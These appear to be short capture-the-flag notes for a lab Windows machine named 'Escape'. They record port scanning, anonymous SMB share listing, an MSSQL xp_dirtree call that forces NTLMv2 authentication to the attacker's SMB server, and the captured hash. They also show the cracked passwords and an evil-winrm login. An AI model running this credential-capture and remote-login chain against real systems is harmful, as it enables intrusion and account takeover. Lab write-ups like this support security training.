Escape

MSSQL | NTLMv2 | Leaking Certificate

nmap -A -Pn -T5 10.10.11.202 > escape.txt

Nmap scan report for 10.10.11.202
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
1433/tcp open  ms-sql-s
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman

smbclient -N -L 10.10.11.202

smbclient -N //10.10.11.202/Public

xp_dirtree '\\10.10.14.111\fg0x0'

impacket-smbserver fg0x0 . -smb2support

sql_svc::sequel:aaaaaaaaaaaaaaaa:a67d3a6c2bc61d49438f83e8cb850d79:010100000000000080be93d2de50d901c497e13ee4bcfbb30000000001001000440063004b0064004a0053005500490003001000440063004b0064004a00530055004900020010006400470049007700520064004400530004001000640047004900770052006400440053000700080080be93d2de50d90106000400020000000800300030000000000000000000000000300000f26169eb30bf0eac34d3f6ff79ec092da66f9ebba85a0e852ac070ebeec4957d0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100310031000000000000000000

Cracked password: REGGIE1234ronnie (sql_svc)

evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie

Select-String "Password" ERRORLOG.BAK

Username: Ryan.Cooper

Password: NuclearMosquito3